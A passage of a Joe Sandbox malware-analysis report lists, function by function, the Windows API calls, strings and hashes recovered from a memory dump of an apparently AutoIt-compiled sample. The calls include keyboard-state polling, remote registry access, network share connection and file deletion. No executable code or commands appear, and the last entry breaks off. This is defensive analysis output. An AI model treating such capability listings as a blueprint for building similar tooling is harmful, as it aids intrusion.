                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B9A0D
                                                          • _wcsncpy.LIBCMT ref: 002B9A80
                                                          • DeleteFileW.KERNEL32(?,?), ref: 002B9AB6
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B9ACC
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9ADD
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9AEF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 08b514678e6faaf4d98abef753982be35f715409adb368dc3e3df2946a53baf9
                                                          • Instruction ID: 421e667a39c4f7a771b2f1d60cce2ffe730fd21b3c11d2b5d8b70b63e080432a
                                                          • Opcode Fuzzy Hash: 08b514678e6faaf4d98abef753982be35f715409adb368dc3e3df2946a53baf9
                                                          • Instruction Fuzzy Hash: 6CC14CB1D10229ABCF21DFA5CC85ADEB7BDEF44340F0040AAF609E7151EB709A948F65
                                                          APIs
                                                          • _memset.LIBCMT ref: 00265BF1
                                                          • GetMenuItemCount.USER32(00317890), ref: 002A0E7B
                                                          • GetMenuItemCount.USER32(00317890), ref: 002A0F2B
                                                          • GetCursorPos.USER32(?), ref: 002A0F6F
                                                          • SetForegroundWindow.USER32(00000000), ref: 002A0F78
                                                          • TrackPopupMenuEx.USER32(00317890,00000000,?,00000000,00000000,00000000), ref: 002A0F8B
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A0F97
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: a2c1dd2b5eae53e38e237181fa97c35a45ab0a9bfc3fdc255b49782354b07551
                                                          • Instruction ID: 1263eadf54ca42a28cf5a2a1212160c5acfe943b2945a9740a42267cd15b33b4
                                                          • Opcode Fuzzy Hash: a2c1dd2b5eae53e38e237181fa97c35a45ab0a9bfc3fdc255b49782354b07551
                                                          • Instruction Fuzzy Hash: E371D030664716BFEB208F54DCC9FAABF64FB05764F200206F518AA1D0CBB168B0DB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,002E0980), ref: 002BAF4E
                                                          • GetDriveTypeW.KERNEL32(00000061,0030B5F0,00000061), ref: 002BB018
                                                          • _wcscpy.LIBCMT ref: 002BB042
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: L,.$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-2424329516
                                                          • Opcode ID: d288946946b8d8c111c804799f5b53fca68f41e04b53ceafdea8f7768fed1240
                                                          • Instruction ID: 7dbf75c8ac2891e51ec44f343593cfaf4b481f8d4c28ecfa07d2f1f7135f0ef6
                                                          • Opcode Fuzzy Hash: d288946946b8d8c111c804799f5b53fca68f41e04b53ceafdea8f7768fed1240
                                                          • Instruction Fuzzy Hash: A851CC301383059BC311EF14C891AEAB7A5EF95384F54881DF896572E2EBB1ED69CE42
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • _memset.LIBCMT ref: 002A8489
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002A84BE
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002A84DA
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002A84F6
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002A8520
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002A8548
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A8553
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A8558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1411258926-22481851
                                                          • Opcode ID: 13c81489f3cc033610ac64d7c248a4c3ad63e39d1f18c0e7a2cb60afde10c4a9
                                                          • Instruction ID: b8d5241841c7a5a0e6636e87786a9154d102ff22371ba32980bb80943aa60c99
                                                          • Opcode Fuzzy Hash: 13c81489f3cc033610ac64d7c248a4c3ad63e39d1f18c0e7a2cb60afde10c4a9
                                                          • Instruction Fuzzy Hash: 5241F772C2022DABCB15EFA4DC95DEDB7B8FF08341B044169E905A6161EA70AE65CF90
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 5398920380f1ac6276ea6fbec9705e207a0e1a763bc512662b30bcdaa224a110
                                                          • Instruction ID: c4a1cc48192323bc7f03be6479dd4dcbc9324f3ea01c1bd1025d84a68476a630
                                                          • Opcode Fuzzy Hash: 5398920380f1ac6276ea6fbec9705e207a0e1a763bc512662b30bcdaa224a110
                                                          • Instruction Fuzzy Hash: 3141543453025AEBCF11EF90E890AEA3324EF55300FA08516FC524B692DB74ED79CB60
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                            • Part of subcall function 0026153B: _memmove.LIBCMT ref: 002615C4
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002B58EB
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002B5901
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B5912
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002B5924
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002B5935
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: c8ea11af5ade714b6283698d6bfaada99b9b506f0ba57a931235cd5a6ebacebd
                                                          • Instruction ID: 88c6cb20f00518cf579cfc050872caf662d5a6293943a3a12e20726d2a1887b6
                                                          • Opcode Fuzzy Hash: c8ea11af5ade714b6283698d6bfaada99b9b506f0ba57a931235cd5a6ebacebd
                                                          • Instruction Fuzzy Hash: 731108305A1169B9D710A7A1CC5AEFFBB7CEFD1B50F940469B401970D0EFA02D60C9E0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 3a82af64131829c76f135d999acedec603e64583da67a1a1751876854e9e7624
                                                          • Instruction ID: 9739190649dc46d313c495f67ee7370da8dd744c9374e859cf124441e4cc6199
                                                          • Opcode Fuzzy Hash: 3a82af64131829c76f135d999acedec603e64583da67a1a1751876854e9e7624
                                                          • Instruction Fuzzy Hash: 02110D31925115ABCB11BB649CC9EDA7BBCDF41B50F0441A6F44896093EFB099E28FA1
                                                          APIs
                                                          • timeGetTime.WINMM ref: 002B5535
                                                            • Part of subcall function 0027083E: timeGetTime.WINMM(?,00000002,0025C22C), ref: 00270842
                                                          • Sleep.KERNEL32(0000000A), ref: 002B5561
                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 002B5585
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002B55A7
                                                          • SetActiveWindow.USER32 ref: 002B55C6
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002B55D4
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 002B55F3
                                                          • Sleep.KERNEL32(000000FA), ref: 002B55FE
                                                          • IsWindow.USER32 ref: 002B560A
                                                          • EndDialog.USER32(00000000), ref: 002B561B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 081b3d34b62c5568a56a24087e1e58cb05dc02bc2fefbe5afb54fd0930dcdd95
                                                          • Instruction ID: 50e4c626114d2cb3aa3e906c83d0b5e6761496524302bdbdf495a8fe5957253a
                                                          • Opcode Fuzzy Hash: 081b3d34b62c5568a56a24087e1e58cb05dc02bc2fefbe5afb54fd0930dcdd95
                                                          • Instruction Fuzzy Hash: 6E21D170254645AFEB525F60FCCCBA63B6FEB49385F445014F0018A1A1CFB19CA2CB35
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • CoInitialize.OLE32(00000000), ref: 002BDC2D
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002BDCC0
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 002BDCD4
                                                          • CoCreateInstance.OLE32(002E3D4C,00000000,00000001,0030B86C,?), ref: 002BDD20
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002BDD8F
                                                          • CoTaskMemFree.OLE32(?,?), ref: 002BDDE7
                                                          • _memset.LIBCMT ref: 002BDE24
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 002BDE60
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002BDE83
                                                          • CoTaskMemFree.OLE32(00000000), ref: 002BDE8A
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002BDEC1
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 002BDEC3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 13b0b3f65a6c665ac293e253f74b90debad8f7f3fb8a3c07e827bd6d1642163a
                                                          • Instruction ID: 920c3dd31a3880abf13fb2f7d9af68496269cf0424046e80603466f686531ab9
                                                          • Opcode Fuzzy Hash: 13b0b3f65a6c665ac293e253f74b90debad8f7f3fb8a3c07e827bd6d1642163a
                                                          • Instruction Fuzzy Hash: E2B10A75A10109AFDB04DFA4C888DAEBBF9FF48304B1484A9E909EB251DB70EE55CF50
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 002B0896
                                                          • SetKeyboardState.USER32(?), ref: 002B0901
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 002B0921
                                                          • GetKeyState.USER32(000000A0), ref: 002B0938
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 002B0967
                                                          • GetKeyState.USER32(000000A1), ref: 002B0978
                                                          • GetAsyncKeyState.USER32(00000011), ref: 002B09A4
                                                          • GetKeyState.USER32(00000011), ref: 002B09B2
                                                          • GetAsyncKeyState.USER32(00000012), ref: 002B09DB
                                                          • GetKeyState.USER32(00000012), ref: 002B09E9
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 002B0A12
                                                          • GetKeyState.USER32(0000005B), ref: 002B0A20
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: df194b70aa2288b40bdc1d2e4c756214b04784f05412274e13725c190e4214c7
                                                          • Instruction ID: 0f330ed95f81807a242924ed4df37c4bf155a21fbf44171970534cffb185026a
                                                          • Opcode Fuzzy Hash: df194b70aa2288b40bdc1d2e4c756214b04784f05412274e13725c190e4214c7
                                                          • Instruction Fuzzy Hash: B451E93091478529FB36DFA044957EBBFB49F017C0F488599C5C2571C3DA64ABACCBA1
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 002ACE1C
                                                          • GetWindowRect.USER32(00000000,?), ref: 002ACE2E
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002ACE8C
                                                          • GetDlgItem.USER32(?,00000002), ref: 002ACE97
                                                          • GetWindowRect.USER32(00000000,?), ref: 002ACEA9
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002ACEFD
                                                          • GetDlgItem.USER32(?,000003E9), ref: 002ACF0B
                                                          • GetWindowRect.USER32(00000000,?), ref: 002ACF1C
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002ACF5F
                                                          • GetDlgItem.USER32(?,000003EA), ref: 002ACF6D
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002ACF8A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 002ACF97
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 152f33e4050c4913ea1f74cd424874171fc81065d3324cda7c998005593ac603
                                                          • Instruction ID: 993928437af7d5abcbca78ee162106f8ace24bafc97daae6b01787f9d8107206
                                                          • Opcode Fuzzy Hash: 152f33e4050c4913ea1f74cd424874171fc81065d3324cda7c998005593ac603
                                                          • Instruction Fuzzy Hash: 9C517271B50205AFDB18CFA8DDC9E6EBBBAEB88310F14812DF515D7290DBB09D518B50
                                                          APIs
                                                            • Part of subcall function 002529AB: GetWindowLongW.USER32(?,000000EB), ref: 002529BC
                                                          • GetSysColor.USER32(0000000F), ref: 002525AF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: bfe8981fd9d24a2e3cbe583bc951c891d709a45aa86f3587ee298d816e489e0c
                                                          • Instruction ID: a10ef1f59c43c66ea2938587d4c9b6be01f9685b9a2ad69cb0a3db5c12ccfd76
                                                          • Opcode Fuzzy Hash: bfe8981fd9d24a2e3cbe583bc951c891d709a45aa86f3587ee298d816e489e0c
                                                          • Instruction Fuzzy Hash: 6A41C230114140EFDB256F68A8CCBB93769EB0A332F184265FD698E1E5D7708C9ADB25
                                                          APIs
                                                            • Part of subcall function 00270B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00262A3E,?,00008000), ref: 00270BA7
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00262ADF
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00262C2C
                                                            • Part of subcall function 00263EBE: _wcscpy.LIBCMT ref: 00263EF6
                                                            • Part of subcall function 0027386D: _iswctype.LIBCMT ref: 00273875
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-3738523708
                                                          • Opcode ID: 63b2cc6e5c81f462754cb9d497650efad1f7bb7580d3928911b298b779cba12c
                                                          • Instruction ID: bf9ffe734c05c053c1b2388d779bedea8298b89d9da0819ba23a53e5b36482eb
                                                          • Opcode Fuzzy Hash: 63b2cc6e5c81f462754cb9d497650efad1f7bb7580d3928911b298b779cba12c
                                                          • Instruction Fuzzy Hash: CD02D030128341DFC764EF24C981AAFBBE5AF85344F14491EF489932A2DB30D9A9CF52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: e0355465f777cba568a94c0015134ebc34d7712a63ceb0aaa1465a7f09bcc2f4
                                                          • Instruction ID: d4241989b0eccbce50ed0dbde72d42b32881d062b20f34d79af35c1ab0a95c42
                                                          • Opcode Fuzzy Hash: e0355465f777cba568a94c0015134ebc34d7712a63ceb0aaa1465a7f09bcc2f4
                                                          • Instruction Fuzzy Hash: 5A41D27563520AAADB24EF64C841E7AB3F8AB04304F20446AE54DD72D2EA7199A98B11
                                                          APIs
                                                          • _memset.LIBCMT ref: 002D778F
                                                          • CreateMenu.USER32 ref: 002D77AA
                                                          • SetMenu.USER32(?,00000000), ref: 002D77B9
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7846
                                                          • IsMenu.USER32(?), ref: 002D785C
                                                          • CreatePopupMenu.USER32 ref: 002D7866
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D7893
                                                          • DrawMenuBar.USER32 ref: 002D789B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: cd8d3ac7f6b8bb9e84d8ea7299aed401acdb8d1a49c5b509d0a02c9f2d26041b
                                                          • Instruction ID: 752e7b652c7994592bbd63fca636af75d4678341d852d527a822c884e1b17ae8
                                                          • Opcode Fuzzy Hash: cd8d3ac7f6b8bb9e84d8ea7299aed401acdb8d1a49c5b509d0a02c9f2d26041b
